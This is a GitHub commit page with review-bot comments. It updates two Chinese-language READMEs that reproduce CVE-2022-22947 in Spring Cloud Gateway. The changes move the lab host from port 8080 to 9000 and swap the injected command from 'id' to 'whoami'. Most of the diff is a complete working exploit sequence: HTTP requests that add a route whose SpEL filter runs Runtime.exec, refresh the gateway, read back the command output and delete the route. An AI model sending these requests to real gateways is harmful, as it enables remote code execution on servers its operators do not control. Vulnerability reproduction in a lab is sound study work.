
Commit

update README.md
helloexp committed Mar 4, 2022
1 parent 35d64ea commit fff9522
Showing 10 changed files with 11 additions and 11 deletions.
12 changes: 6 additions & 6 deletions 00-CVE_EXP/CVE-2022-22947/README.md
Expand Up @@ -7,7 +7,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(

[环境搭建过程](环境搭建)

服务启动后,访问`http://your-ip:8080`即可看到演示页面,这个页面的上游就是example.com。
服务启动后,访问`http://your-ip:9000`即可看到演示页面

## 漏洞复现

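Review bot: The rewritten setup sentence in this hunk loses its closing "。" and drops the clause saying the demo page's upstream is example.com, while the sample route later in the same README still sets "uri": "http://example.com". Restore the full stop, and either keep the upstream remark or say what the page on port 9000 now shows. The environment setup page linked just above should be checked so that it describes port 9000 as well.
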
Expand All @@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(

```
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
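Review bot: The Host header here becomes localhost:9000, but the setup sentence in the same file tells the reader to browse to http://your-ip:9000. Use one placeholder for the lab host in both places so the README does not read as if it described two different hosts. The same applies to the Host lines of the refresh, GET and DELETE requests further down.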
Expand All @@ -29,7 +29,7 @@ Content-Length: 328
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
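Review bot: The command inside the SpEL expression on the "args" line changes from id to whoami, a content change that the commit message "update README.md" does not mention, alongside the port change and the four replaced screenshots. State in the commit message why the sample was changed, so that someone comparing the two revisions can tell whether it tracks a change in the lab environment.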
Expand All @@ -41,7 +41,7 @@ Content-Length: 328

```
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -57,7 +57,7 @@ Content-Length: 0

```
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -73,7 +73,7 @@ Content-Length: 0

```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/1.png
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/2.png
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/3.png
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/4.png
10 changes: 5 additions & 5 deletions 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
Expand Up @@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(

```
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
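Review bot: This copy receives the same Host, payload and request edits as 00-CVE_EXP/CVE-2022-22947/README.md, but its diff starts at line 16 and has no hunk for the setup sentence that the other copy updates from 8080 to 9000. Check whether this README still has a sentence pointing at port 8080, and consider keeping one copy and linking to it from the other so the two cannot drift apart.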
Expand All @@ -29,7 +29,7 @@ Content-Length: 328
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
Expand All @@ -41,7 +41,7 @@ Content-Length: 328

```
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -57,7 +57,7 @@ Content-Length: 0

```
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -73,7 +73,7 @@ Content-Length: 0

```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Binary file modified 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png

0 comments on commit fff9522
